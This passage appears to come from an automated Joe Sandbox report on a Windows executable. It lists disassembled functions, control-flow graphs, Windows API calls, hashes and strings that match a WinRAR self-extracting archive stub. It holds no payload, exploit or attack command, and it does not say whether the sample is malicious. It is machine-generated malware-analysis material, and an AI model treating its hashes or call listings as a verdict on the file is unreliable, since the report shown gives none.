                                                                  • _wcslen.LIBCMT ref: 00CCBEBE
                                                                  • _swprintf.LIBCMT ref: 00CCBEE8
                                                                  • SendMessageW.USER32(?,00000080,00000001,?), ref: 00CCBF32
                                                                  • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 00CCBF4C
                                                                  • GetDlgItem.USER32(?,00000068), ref: 00CCBF55
                                                                  • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 00CCBF6B
                                                                  • GetDlgItem.USER32(?,00000066), ref: 00CCBF85
                                                                  • SetWindowTextW.USER32(00000000,00CFA472), ref: 00CCBFA7
                                                                  • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 00CCC007
                                                                  • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00CCC01A
                                                                  • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 00CCC0BD
                                                                  • EnableWindow.USER32(00000000,00000000), ref: 00CCC197
                                                                  • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 00CCC1D9
                                                                    • Part of subcall function 00CCC73F: __EH_prolog.LIBCMT ref: 00CCC744
                                                                  • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00CCC1FD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l
                                                                  • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                                                  • API String ID: 3445078344-2608530638
                                                                  • Opcode ID: 9ffc09b88b5a6c13d2ee2a1b3b13c4cafc7c72b13dc7c619aeefd75294189659
                                                                  • Instruction ID: 21ba4bcac1cebf126a61359d3ea50f7f55039dce4de45e99249df0392e31d5e8
                                                                  • Opcode Fuzzy Hash: 9ffc09b88b5a6c13d2ee2a1b3b13c4cafc7c72b13dc7c619aeefd75294189659
                                                                  • Instruction Fuzzy Hash: B342C171944348BAEB21ABA0DC8AFFE7B7CAB01700F04415DF659E61D2CB745E49DB22

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 268 cc0863-cc0886 call ccec50 GetModuleHandleW 271 cc0888-cc089f GetProcAddress 268->271 272 cc08e7-cc0b48 268->272 273 cc08b9-cc08c9 GetProcAddress 271->273 274 cc08a1-cc08b7 271->274 275 cc0b4e-cc0b59 call cd75fb 272->275 276 cc0c14-cc0c40 GetModuleFileNameW call cbc29a call cc0602 272->276 278 cc08cb-cc08e0 273->278 279 cc08e5 273->279 274->273 275->276 285 cc0b5f-cc0b8d GetModuleFileNameW CreateFileW 275->285 290 cc0c42-cc0c4e call cbb146 276->290 278->279 279->272 288 cc0b8f-cc0b9b SetFilePointer 285->288 289 cc0c08-cc0c0f CloseHandle 285->289 288->289 291 cc0b9d-cc0bb9 ReadFile 288->291 289->276 297 cc0c7d-cc0ca4 call cbc310 GetFileAttributesW 290->297 298 cc0c50-cc0c5b call cc081b 290->298 291->289 294 cc0bbb-cc0be0 291->294 296 cc0bfd-cc0c06 call cc0371 294->296 296->289 305 cc0be2-cc0bfc call cc081b 296->305 308 cc0cae 297->308 309 cc0ca6-cc0caa 297->309 298->297 307 cc0c5d-cc0c7b CompareStringW 298->307 305->296 307->297 307->309 312 cc0cb0-cc0cb5 308->312 309->290 311 cc0cac 309->311 311->312 313 cc0cec-cc0cee 312->313 314 cc0cb7 312->314 316 cc0dfb-cc0e05 313->316 317 cc0cf4-cc0d0b call cbc2e4 call cbb146 313->317 315 cc0cb9-cc0ce0 call cbc310 GetFileAttributesW 314->315 322 cc0cea 315->322 323 cc0ce2-cc0ce6 315->323 327 cc0d0d-cc0d6e call cc081b * 2 call cbe617 call cb4092 call cbe617 call cca7e4 317->327 328 cc0d73-cc0da6 call cb4092 AllocConsole 317->328 322->313 323->315 325 cc0ce8 323->325 325->313 335 cc0df3-cc0df5 ExitProcess 327->335 334 cc0da8-cc0ded GetCurrentProcessId AttachConsole call cd3e13 GetStdHandle WriteConsoleW Sleep FreeConsole 328->334 328->335 334->335
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(kernel32), ref: 00CC087C
                                                                  • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00CC088E
                                                                  • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00CC08BF
                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00CC0B69
                                                                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00CC0B83
                                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00CC0B93
                                                                  • ReadFile.KERNEL32(00000000,?,00007FFE,00CE3C7C,00000000), ref: 00CC0BB1
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00CC0C09
                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00CC0C1E
                                                                  • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,00CE3C7C,?,00000000,?,00000800), ref: 00CC0C72
                                                                  • GetFileAttributesW.KERNELBASE(?,?,00CE3C7C,00000800,?,00000000,?,00000800), ref: 00CC0C9C
                                                                  • GetFileAttributesW.KERNEL32(?,?,00CE3D44,00000800), ref: 00CC0CD8
                                                                    • Part of subcall function 00CC081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00CC0836
                                                                    • Part of subcall function 00CC081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00CBF2D8,Crypt32.dll,00000000,00CBF35C,?,?,00CBF33E,?,?,?), ref: 00CC0858
                                                                  • _swprintf.LIBCMT ref: 00CC0D4A
                                                                  • _swprintf.LIBCMT ref: 00CC0D96
                                                                    • Part of subcall function 00CB4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CB40A5
                                                                  • AllocConsole.KERNEL32 ref: 00CC0D9E
                                                                  • GetCurrentProcessId.KERNEL32 ref: 00CC0DA8
                                                                  • AttachConsole.KERNEL32(00000000), ref: 00CC0DAF
                                                                  • _wcslen.LIBCMT ref: 00CC0DC4
                                                                  • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00CC0DD5
                                                                  • WriteConsoleW.KERNEL32(00000000), ref: 00CC0DDC
                                                                  • Sleep.KERNEL32(00002710), ref: 00CC0DE7
                                                                  • FreeConsole.KERNEL32 ref: 00CC0DED
                                                                  • ExitProcess.KERNEL32 ref: 00CC0DF5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                                  • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                                                  • API String ID: 1207345701-3298887752
                                                                  • Opcode ID: 4557df35dd39eeddc50bfadfad56c7540eacd8bcbb74f41b5167c2633da87816
                                                                  • Instruction ID: 0fb278599774a858403ee09e8c20abe33da593e9d0c3d800d3e1d55a53a5033c
                                                                  • Opcode Fuzzy Hash: 4557df35dd39eeddc50bfadfad56c7540eacd8bcbb74f41b5167c2633da87816
                                                                  • Instruction Fuzzy Hash: A6D15FF14083C4ABDB219F52C88DF9FBAE8AB85704F50491DF2959B150CBB4A749CB62

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 347 ccc73f-ccc757 call cceb78 call ccec50 352 ccd40d-ccd418 347->352 353 ccc75d-ccc787 call ccb314 347->353 353->352 356 ccc78d-ccc792 353->356 357 ccc793-ccc7a1 356->357 358 ccc7a2-ccc7b7 call ccaf98 357->358 361 ccc7b9 358->361 362 ccc7bb-ccc7d0 call cc1fbb 361->362 365 ccc7dd-ccc7e0 362->365 366 ccc7d2-ccc7d6 362->366 367 ccd3d9-ccd404 call ccb314 365->367 368 ccc7e6 365->368 366->362 369 ccc7d8 366->369 367->357 384 ccd40a-ccd40c 367->384 370 ccca7c-ccca7e 368->370 371 ccc7ed-ccc7f0 368->371 372 ccc9be-ccc9c0 368->372 373 ccca5f-ccca61 368->373 369->367 370->367 375 ccca84-ccca8b 370->375 371->367 377 ccc7f6-ccc850 call cca64d call cbbdf3 call cba544 call cba67e call cb6edb 371->377 372->367 376 ccc9c6-ccc9d2 372->376 373->367 379 ccca67-ccca77 SetWindowTextW 373->379 375->367 380 ccca91-cccaaa 375->380 381 ccc9d4-ccc9e5 call cd7686 376->381 382 ccc9e6-ccc9eb 376->382 438 ccc98f-ccc9a4 call cba5d1 377->438 379->367 385 cccaac 380->385 386 cccab2-cccac0 call cd3e13 380->386 381->382 389 ccc9ed-ccc9f3 382->389 390 ccc9f5-ccca00 call ccb48e 382->390 384->352 385->386 386->367 402 cccac6-cccacf 386->402 394 ccca05-ccca07 389->394 390->394 399 ccca09-ccca10 call cd3e13 394->399 400 ccca12-ccca32 call cd3e13 call cd3e3e 394->400 399->400 421 ccca4b-ccca4d 400->421 422 ccca34-ccca3b 400->422 406 cccaf8-cccafb 402->406 407 cccad1-cccad5 402->407 412 cccb01-cccb04 406->412 414 cccbe0-cccbee call cc0602 406->414 411 cccad7-cccadf 407->411 407->412 411->367 417 cccae5-cccaf3 call cc0602 411->417 419 cccb06-cccb0b 412->419 420 cccb11-cccb2c 412->420 430 cccbf0-cccc04 call cd279b 414->430 417->430 419->414 419->420 433 cccb2e-cccb68 420->433 434 cccb76-cccb7d 420->434 421->367 429 ccca53-ccca5a call cd3e2e 421->429 427 ccca3d-ccca3f 422->427 428 ccca42-ccca4a call cd7686 422->428 427->428 428->421 429->367 448 cccc06-cccc0a 430->448 449 cccc11-cccc62 call cc0602 call ccb1be GetDlgItem SetWindowTextW SendMessageW call cd3e49 430->449 469 cccb6c-cccb6e 433->469 470 cccb6a 433->470 440 cccb7f-cccb97 call cd3e13 434->440 441 cccbab-cccbce call cd3e13 * 2 434->441 455 ccc9aa-ccc9b9 call cba55a 438->455 456 ccc855-ccc869 SetFileAttributesW 438->456 440->441 460 cccb99-cccba6 call cc05da 440->460 441->430 474 cccbd0-cccbde call cc05da 441->474 448->449 454 cccc0c-cccc0e 448->454 481 cccc67-cccc6b 449->481 454->449 455->367 462 ccc90f-ccc91f GetFileAttributesW 456->462 463 ccc86f-ccc8a2 call cbb991 call cbb690 call cd3e13 456->463 460->441 462->438 468 ccc921-ccc930 DeleteFileW 462->468 490 ccc8a4-ccc8b3 call cd3e13 463->490 491 ccc8b5-ccc8c3 call cbbdb4 463->491 468->438 475 ccc932-ccc935 468->475 469->434 470->469 474->430 479 ccc939-ccc965 call cb4092 GetFileAttributesW 475->479 488 ccc937-ccc938 479->488 489 ccc967-ccc97d MoveFileW 479->489 481->367 485 cccc71-cccc85 SendMessageW 481->485 485->367 488->479 489->438 492 ccc97f-ccc989 MoveFileExW 489->492 490->491 497 ccc8c9-ccc908 call cd3e13 call ccfff0 490->497 491->455 491->497 492->438 497->462
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 00CCC744
                                                                    • Part of subcall function 00CCB314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00CCB3FB
                                                                  • _wcslen.LIBCMT ref: 00CCCA0A
                                                                  • _wcslen.LIBCMT ref: 00CCCA13
                                                                  • SetWindowTextW.USER32(?,?), ref: 00CCCA71
                                                                  • _wcslen.LIBCMT ref: 00CCCAB3
                                                                  • _wcsrchr.LIBVCRUNTIME ref: 00CCCBFB
                                                                  • GetDlgItem.USER32(?,00000066), ref: 00CCCC36
                                                                  • SetWindowTextW.USER32(00000000,?), ref: 00CCCC46
                                                                  • SendMessageW.USER32(00000000,00000143,00000000,00CFA472), ref: 00CCCC54
                                                                  • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00CCCC7F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                                                                  • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                                  • API String ID: 2804936435-312220925
                                                                  • Opcode ID: 617691eb79e9a1a1fb1902fd3d0733ace38478cf29299b12413d5eea44b85f3f
                                                                  • Instruction ID: 4c6061328879a0902ccbcd2adc4d49b19a27e4330776386226d5cf00c6db9ca3
                                                                  • Opcode Fuzzy Hash: 617691eb79e9a1a1fb1902fd3d0733ace38478cf29299b12413d5eea44b85f3f
                                                                  • Instruction Fuzzy Hash: AAE176B2900258AADF24DBA0DC85FEE73BCAB04350F1440AAF659E7150EF749F859F61
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 00CBDA70
                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00CBDAAC
                                                                    • Part of subcall function 00CBC29A: _wcslen.LIBCMT ref: 00CBC2A2
                                                                    • Part of subcall function 00CC05DA: _wcslen.LIBCMT ref: 00CC05E0
                                                                    • Part of subcall function 00CC1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00CBBAE9,00000000,?,?,?,00010410), ref: 00CC1BA0
                                                                  • _wcslen.LIBCMT ref: 00CBDDE9
                                                                  • __fprintf_l.LIBCMT ref: 00CBDF1C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
                                                                  • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                                                                  • API String ID: 566448164-801612888
                                                                  • Opcode ID: ab3dc5f98c4ef3b4cd61714bd2b497f6949bc656182eb2c4ea4c309046411f58
                                                                  • Instruction ID: 2398518de54f8aec959c4c1b31161eea02ed01c276d06797a483a002415b2d7e
                                                                  • Opcode Fuzzy Hash: ab3dc5f98c4ef3b4cd61714bd2b497f6949bc656182eb2c4ea4c309046411f58
                                                                  • Instruction Fuzzy Hash: 3B32F371900258DBCF24EF68C845BEE77A8FF14700F50056AFA1697292EBB1EE85DB50

                                                                  Control-flow Graph

                                                                  APIs
                                                                    • Part of subcall function 00CCB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00CCB579
                                                                    • Part of subcall function 00CCB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CCB58A
                                                                    • Part of subcall function 00CCB568: IsDialogMessageW.USER32(00010410,?), ref: 00CCB59E
                                                                    • Part of subcall function 00CCB568: TranslateMessage.USER32(?), ref: 00CCB5AC
                                                                    • Part of subcall function 00CCB568: DispatchMessageW.USER32(?), ref: 00CCB5B6
                                                                  • GetDlgItem.USER32(00000068,00D0FCB8), ref: 00CCD4E8
                                                                  • ShowWindow.USER32(00000000,00000005,?,?,?,00CCAF07,00000001,?,?,00CCB7B9,00CE506C,00D0FCB8,00D0FCB8,00001000,00000000,00000000), ref: 00CCD510
                                                                  • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00CCD51B
                                                                  • SendMessageW.USER32(00000000,000000C2,00000000,00CE35F4), ref: 00CCD529
                                                                  • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00CCD53F
                                                                  • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00CCD559
                                                                  • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00CCD59D
                                                                  • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00CCD5AB
                                                                  • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00CCD5BA
                                                                  • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00CCD5E1
                                                                  • SendMessageW.USER32(00000000,000000C2,00000000,00CE43F4), ref: 00CCD5F0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                  • String ID: \
                                                                  • API String ID: 3569833718-2967466578
                                                                  • Opcode ID: 014a531cc1eaefed2a24c51d7d7a55d7f6c512791d4a5a378b6a4da9248ad306
                                                                  • Instruction ID: b6804e9cb59c1403e610ada1f8f795e9ba44d35200b48c09faf20d5a43e0a90e
                                                                  • Opcode Fuzzy Hash: 014a531cc1eaefed2a24c51d7d7a55d7f6c512791d4a5a378b6a4da9248ad306
                                                                  • Instruction Fuzzy Hash: 6C31BE71145342BBE301DF20DC4AFAB7FACEB86704F004518F551D62A0DB749A0AC776

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 836 ccd78f-ccd7a7 call ccec50 839 ccd7ad-ccd7b9 call cd3e13 836->839 840 ccd9e8-ccd9f0 836->840 839->840 843 ccd7bf-ccd7e7 call ccfff0 839->843 846 ccd7e9 843->846 847 ccd7f1-ccd7ff 843->847 846->847 848 ccd801-ccd804 847->848 849 ccd812-ccd818 847->849 850 ccd808-ccd80e 848->850 851 ccd85b-ccd85e 849->851 853 ccd837-ccd844 850->853 854 ccd810 850->854 851->850 852 ccd860-ccd866 851->852 855 ccd86d-ccd86f 852->855 856 ccd868-ccd86b 852->856 858 ccd84a-ccd84e 853->858 859 ccd9c0-ccd9c2 853->859 857 ccd822-ccd82c 854->857 860 ccd882-ccd898 call cbb92d 855->860 861 ccd871-ccd878 855->861 856->855 856->860 862 ccd82e 857->862 863 ccd81a-ccd820 857->863 864 ccd854-ccd859 858->864 865 ccd9c6 858->865 859->865 872 ccd89a-ccd8a7 call cc1fbb 860->872 873 ccd8b1-ccd8bc call cba231 860->873 861->860 866 ccd87a 861->866 862->853 863->857 868 ccd830-ccd833 863->868 864->851 869 ccd9cf 865->869 866->860 868->853 871 ccd9d6-ccd9d8 869->871 874 ccd9da-ccd9dc 871->874 875 ccd9e7 871->875 872->873 881 ccd8a9 872->881 882 ccd8be-ccd8d5 call cbb6c4 873->882 883 ccd8d9-ccd8e6 ShellExecuteExW 873->883 874->875 878 ccd9de-ccd9e1 ShowWindow 874->878 875->840 878->875 881->873 882->883 883->875 885 ccd8ec-ccd8f9 883->885 887 ccd90c-ccd90e 885->887 888 ccd8fb-ccd902 885->888 890 ccd925-ccd944 call ccdc3b 887->890 891 ccd910-ccd919 887->891 888->887 889 ccd904-ccd90a 888->889 889->887 892 ccd97b-ccd987 CloseHandle 889->892 890->892 904 ccd946-ccd94e 890->904 891->890 899 ccd91b-ccd923 ShowWindow 891->899 893 ccd998-ccd9a6 892->893 894 ccd989-ccd996 call cc1fbb 892->894 893->871 898 ccd9a8-ccd9aa 893->898 894->869 894->893 898->871 902 ccd9ac-ccd9b2 898->902 899->890 902->871 905 ccd9b4-ccd9be 902->905 904->892 906 ccd950-ccd961 GetExitCodeProcess 904->906 905->871 906->892 907 ccd963-ccd96d 906->907 908 ccd96f 907->908 909 ccd974 907->909 908->909 909->892
                                                                  APIs
                                                                  • _wcslen.LIBCMT ref: 00CCD7AE
                                                                  • ShellExecuteExW.SHELL32(?), ref: 00CCD8DE
                                                                  • ShowWindow.USER32(?,00000000), ref: 00CCD91D
                                                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 00CCD959
                                                                  • CloseHandle.KERNEL32(?), ref: 00CCD97F
                                                                  • ShowWindow.USER32(?,00000001), ref: 00CCD9E1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                                                  • String ID: .exe$.inf
                                                                  • API String ID: 36480843-3750412487
                                                                  • Opcode ID: eb72b740c9000ab91ca13129aec70e2ad37306fa98df61c808a32c57bd9ea4ed
                                                                  • Instruction ID: 55d16ffbcd84a274fdefb6d218f196cc141c7f6077c6cf743729536e5dddd270
                                                                  • Opcode Fuzzy Hash: eb72b740c9000ab91ca13129aec70e2ad37306fa98df61c808a32c57bd9ea4ed
                                                                  • Instruction Fuzzy Hash: 0651C375404380AAEB309F24D844FBBBBE4AF86744F04043EF5D697291DBB19B85DB62

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 910 cda95b-cda974 911 cda98a-cda98f 910->911 912 cda976-cda986 call cdef4c 910->912 914 cda99c-cda9c0 MultiByteToWideChar 911->914 915 cda991-cda999 911->915 912->911 922 cda988 912->922 917 cda9c6-cda9d2 914->917 918 cdab53-cdab66 call ccfbbc 914->918 915->914 919 cda9d4-cda9e5 917->919 920 cdaa26 917->920 923 cdaa04-cdaa15 call cd8e06 919->923 924 cda9e7-cda9f6 call ce2010 919->924 926 cdaa28-cdaa2a 920->926 922->911 929 cdab48 923->929 936 cdaa1b 923->936 924->929 935 cda9fc-cdaa02 924->935 926->929 930 cdaa30-cdaa43 MultiByteToWideChar 926->930 934 cdab4a-cdab51 call cdabc3 929->934 930->929 933 cdaa49-cdaa5b call cdaf6c 930->933 941 cdaa60-cdaa64 933->941 934->918 940 cdaa21-cdaa24 935->940 936->940 940->926 941->929 942 cdaa6a-cdaa71 941->942 943 cdaaab-cdaab7 942->943 944 cdaa73-cdaa78 942->944 946 cdaab9-cdaaca 943->946 947 cdab03 943->947 944->934 945 cdaa7e-cdaa80 944->945 945->929 948 cdaa86-cdaaa0 call cdaf6c 945->948 950 cdaacc-cdaadb call ce2010 946->950 951 cdaae5-cdaaf6 call cd8e06 946->951 949 cdab05-cdab07 947->949 948->934 963 cdaaa6 948->963 953 cdab09-cdab22 call cdaf6c 949->953 954 cdab41-cdab47 call cdabc3 949->954 950->954 966 cdaadd-cdaae3 950->966 951->954 962 cdaaf8 951->962 953->954 968 cdab24-cdab2b 953->968 954->929 967 cdaafe-cdab01 962->967 963->929 966->967 967->949 969 cdab2d-cdab2e 968->969 970 cdab67-cdab6d 968->970 971 cdab2f-cdab3f WideCharToMultiByte 969->971 970->971 971->954 972 cdab6f-cdab76 call cdabc3 971->972 972->934
                                                                  APIs
                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00CD57FB,00CD57FB,?,?,?,00CDABAC,00000001,00000001,2DE85006), ref: 00CDA9B5
                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00CDABAC,00000001,00000001,2DE85006,?,?,?), ref: 00CDAA3B
                                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00CDAB35
                                                                  • __freea.LIBCMT ref: 00CDAB42
                                                                    • Part of subcall function 00CD8E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00CD4286,?,0000015D,?,?,?,?,00CD5762,000000FF,00000000,?,?), ref: 00CD8E38
                                                                  • __freea.LIBCMT ref: 00CDAB4B
                                                                  • __freea.LIBCMT ref: 00CDAB70
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
